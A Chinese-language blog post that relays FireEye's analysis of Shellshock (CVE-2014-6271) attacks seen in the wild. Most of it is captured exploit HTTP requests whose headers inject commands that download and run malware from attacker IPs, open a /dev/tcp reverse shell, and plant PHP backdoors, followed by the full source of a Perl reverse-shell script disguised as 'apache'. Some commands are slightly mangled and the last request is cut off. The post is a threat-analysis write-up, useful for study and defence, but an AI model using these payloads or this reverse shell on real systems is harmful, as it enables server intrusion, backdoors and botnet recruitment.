FireEye关于破壳漏洞(shellshock)在现实中的利用有一篇文章: shellshock in the wild
原文较长,进行了对CGI利用的详细分析,笔者比较感兴趣的是Shellshock in the wild, 包括反弹shell、植入后门、信息窃取等行为如何实现。笔者从原文中摘出了对应利用方式的HTTP报文,感兴趣的朋友可以看原文获取较详细的分析,也可以自己试着分析一下。笔者从Bash漏洞曝光以来,对其进行了数日的跟踪,对CVE-2014-6271破壳漏洞的跟踪
Reverse Shell Perl Script:
GET /cgi-sys/defaultwebpage.cgi HTTP/1.1
User-Agent: () { :;}; /bin/ -c “/usr/bin/wget http://singlesaints\[.\]com/firefile/temp?h= -O /tmp/a.pl”
Host:
Accept: */*
Tsunami/Kaiten, an IRC-based DDoS Client/Backdoor:
GET /cgi-sys/defaultwebpage.cgi HTTP/1.0
User-Agent: shellshock-scan (http://blog.erratasec.com/2014/09/-shellshock-scan-of-internet.html)
Accept: */*
Cookie: () { :; }; wget -O /tmp/besh http://104.192.103.6/bosh; chmod 777 /tmp/besh; /tmp/besh;
Host: () { :; }; wget -O /tmp/besh http://104.192.103.6/bosh; chmod 777 /tmp/besh; /tmp/besh;
Referer: () { :; }; wget -O /tmp/besh http://104.192.103.6/bosh; chmod 777 /tmp/besh; /tmp/besh;
UDP Flood:
GET / HTTP/1.0
User-Agent: masscan/1.0 (https://github.com/robertdavidgraham/masscan)
Accept: */*
Cookie: () { :; }; wget 37.187.225.119/conf.txt > /var/www/conf.php; wget 37.187.225.119/conf.txt > /var/www/html/conf.php
Host: () { :; }; wget 37.187.225.119/conf.txt > /var/www/conf.php; wget 37.187.225.119/conf.txt > /var/www/html/conf.php Referer: () { :; }; wget 37.187.225.119/conf.txt > /var/ www/conf.php; wget 37.187.225.119/conf.txt > /var/www/html/conf.php
Perl.Shellbot, another IRC-based DDoS Client/Backdoor:
GET / HTTP/1.0
Accept: */*
Accept-Language: en-US
User-Agent: () { :;}; /bin/ -c ‘ -i >& /dev/tcp/195.225.34.101/3333 0>&1′
Host:
Connection: Close
Another Perl.Shellbot Variant:
GET /cgi-bin/hello HTTP/1.0
User-Agent: () { :;}; /bin/ -c “cd /tmp; wget http://dl.directxex\[.\]net/dl/nice.png; chmod +x *; perl nice.png” Host:
Tiny Reverse Shell ELF Executable:
GET /cgi-bin/ICuGI/EST/blast_detail.cgi%3FID%3DPU056535%26db%3DGenBank%26organism%3Dcucurbita_pepo HTTP/1.1
Host:
content-length: 0
accept-encoding: gzip, deflate
referrer: () { :; }; /bin/ -c “rm /tmp/.osock; if $(/bin/uname -m | /bin/grep 64) ; then /usr/bin/wget 82.118.242.223:9199/v64 -O /tmp/.osock; /usr/bin/lwp-download http://82.118.242\[.\]223:9199/v64 /tmp/.osock; /usr/bin/curl http://82.118.242.223:9199/v64 -o /tmp/.osock; else /usr/bin/wget 82.118.242.223:9199/v -O /tmp/.osock; /usr/bin/lwp-download http://82.118.242\[.\]223:9199/v /tmp/.osock; /usr/bin/curl http://82.118.242\[.\]223:91 99/v -o /tmp/.osock; fi; /bin/chmod 777 /tmp/.osock; /tmp/.osock”
accept: */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36
cookie: () { :; }; /bin/ -c “rm /tmp/.osock; if $(/bin/uname -m | /bin/grep 64) ; then /usr/bin/wget 82.118.242.223:9199/v64 -O /tmp/.osock; /usr/bin/lwp-download http://82.118.242\[.\]223:919
对于前文提到的第一个Perl的反弹脚本,其源码地址为:http://ww7.microtek.com.tw/Uploads/test/ttyClient.pl
#!/usr/bin/perl -w
use IO::Socket;
use Fcntl;
# IOCTLs
$TIOCGPTN = -2147199952;
$TIOCSPTLCK = 1074025521;
$EAGAIN\=11;
print "pmsh.pl v0.1 (c) 2006 Michael Schierl <schierlm-public AT gmx DOT de>\\n";
$HOST\=$ARGV\[0\];
$PORT\=$ARGV\[1\];
$0\="apache";
print "Connecting to $HOST:$PORT... ";
$sock = new IO::Socket::INET (
PeerAddr \=> $HOST,
PeerPort \=> $PORT,
Proto \=> 'tcp',
Blocking \=> 0,
) or die $!;
print "ok\\nAllocatig pseudo terminal... ";
#\# ptsname
sysopen (PTMX, '/dev/ptmx', O\_RDWR|O\_NONBLOCK) or die $!;
$tmp\='';
ioctl (PTMX, $TIOCGPTN, $tmp) or die $!;
$pts = unpack('i', $tmp);
print "/dev/pts/$pts\\nInitializing pseudo terminal... ";
#\# grantpt not needed on devpts
## unlockpt
$unlock\=pack('i', 0);
ioctl(PTMX, $TIOCSPTLCK, $unlock) or die $!;
#\# prepare daemonizing
chdir '/' or die $!;
open STDIN, '/dev/null' or die $!;
umask 0;
print "ok\\nForking shell thread...";
defined($pid = fork) or die $!;
exit if $pid;
defined($pid = fork) or die $!;
if (!$pid) {
exec("/sbin/getty -n -l /bin/bash 38400 /dev/pts/$pts") or
exec("/bin/bash </dev/pts/$pts >/dev/pts/$pts 2>/dev/pts/$pts") or
die $!;
exit;
}
print "ok\\nHave fun!\\n";
open STDOUT, '\>>/dev/null' or die $!;
open STDERR, '\>>/dev/null' or die $!;
$pp = PTMX;
$rin\=$win\=$ein\='';
vec($rin,fileno($pp),1) =1;
vec($rin,fileno($sock),1) = 1;
select $sock;
$|=1;
select PTMX;
$|=1;
select STDOUT;
$|=1;
$finished\=0;
sub forwarddata {
my ($from,$to) = @\_;
while(1) {
$rv = sysread($from, $buff, 1024);
last if (!defined($rv) && $! == $EAGAIN);
defined($rv) or die $!;
if ($rv == 0) { $finished = 1; last;}
while(length $buff > 0) {
$rv = syswrite($to, $buff, length $buff);
if (!defined($rv) && $! == $EAGAIN) {
#\# try again
next;
}
defined($rv) or die $!;
last if ($rv == length $buff);
substr($buff,0,$rv) = '';
}
}
}
while(! $finished) {
$nfound = select($rout\=$rin, $wout\=$win, $eout\=$ein, undef);
die $! if ($nfound == -1);
forwarddata($pp,$sock);
last if $finished;
forwarddata($sock,$pp);
last if $finished;
}
close PTMX;
close $sock;
$wout\=$eout.$wout.$rout;